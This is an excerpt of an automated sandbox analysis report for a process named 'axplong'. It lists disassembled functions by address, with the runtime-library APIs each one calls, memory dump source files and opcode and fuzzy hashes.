                                                                                                                                                                                                                                                    Function 0069EB78 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0069EBB1
                                                                                                                                                                                                                                                      • Part of subcall function 00698E5F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00698E80
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0069EC17
                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0069EC2F
                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0069EC3C
                                                                                                                                                                                                                                                      • Part of subcall function 0069E6DF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0069E707
                                                                                                                                                                                                                                                      • Part of subcall function 0069E6DF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0069E79F
                                                                                                                                                                                                                                                      • Part of subcall function 0069E6DF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0069E7A9
                                                                                                                                                                                                                                                      • Part of subcall function 0069E6DF: Concurrency::location::_Assign.LIBCMT ref: 0069E7DD
                                                                                                                                                                                                                                                      • Part of subcall function 0069E6DF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0069E7E5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2363638799-0
                                                                                                                                                                                                                                                    • Opcode ID: 18d3f17751f43abc75a3926eb46f699efa047f00dd2c68648caa706191fe3620
                                                                                                                                                                                                                                                    • Instruction ID: 202e5d463b0cf5f23bceebce1399f8ebcef6fabf1f152638548bcb9313f6076b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18d3f17751f43abc75a3926eb46f699efa047f00dd2c68648caa706191fe3620
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F451CF75A00204EBDF14EF54C895FADB77BAF44310F1540A9E9427B792CB72AE46CBA0
                                                                                                                                                                                                                                                    Function 0068DCC1 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d9804ad846a8a78eaadf2ea16d9aecba065a018f777d67ace2cb5cbf23821123
                                                                                                                                                                                                                                                    • Instruction ID: c7c250d822a0feeb99f7975fb1785f7d755d4125f6d84f6b0e6969044238f611
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9804ad846a8a78eaadf2ea16d9aecba065a018f777d67ace2cb5cbf23821123
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3518AB2E016168FDB25CF55D8957AABBF2FB58300F24866AC801EB794D3349940CF60
                                                                                                                                                                                                                                                    Function 04B30613 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2991010300.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4b30000_axplong.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 909eeb23dca13a197811285042ea2646a64164b464f733772beffd03e1817844
                                                                                                                                                                                                                                                    • Instruction ID: 87bf372772d518477d24c04390e842099d90aa06660b3c7b4ebcce6709f5ca53
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 909eeb23dca13a197811285042ea2646a64164b464f733772beffd03e1817844
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F0193EB64C1613D7501D5662F28EFB6B6DE4C1B70332C86BF806E640AE7855A4E60B1
                                                                                                                                                                                                                                                    Function 0068EF58 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0068F1EB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pEvents
                                                                                                                                                                                                                                                    • API String ID: 2141394445-2498624650
                                                                                                                                                                                                                                                    • Opcode ID: 695f11111da8f9306ac967a32929c87e334d233fa9455a135754f17c5a10f833
                                                                                                                                                                                                                                                    • Instruction ID: 50bc0ecfe38be14dc7c8dd13718278becc70061b104147f0fed7fbd04a98ad79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 695f11111da8f9306ac967a32929c87e334d233fa9455a135754f17c5a10f833
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40819D31D00219DFDF24FFA8C885BEEB7B6AF05314F244629E441A7382DB76A946CB51
                                                                                                                                                                                                                                                    Function 006A25FE Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006A2610
                                                                                                                                                                                                                                                      • Part of subcall function 006A240E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006A2431
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006A2631
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006A263E
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006A268C
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006A2713
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 006A2726
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 006A2773
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
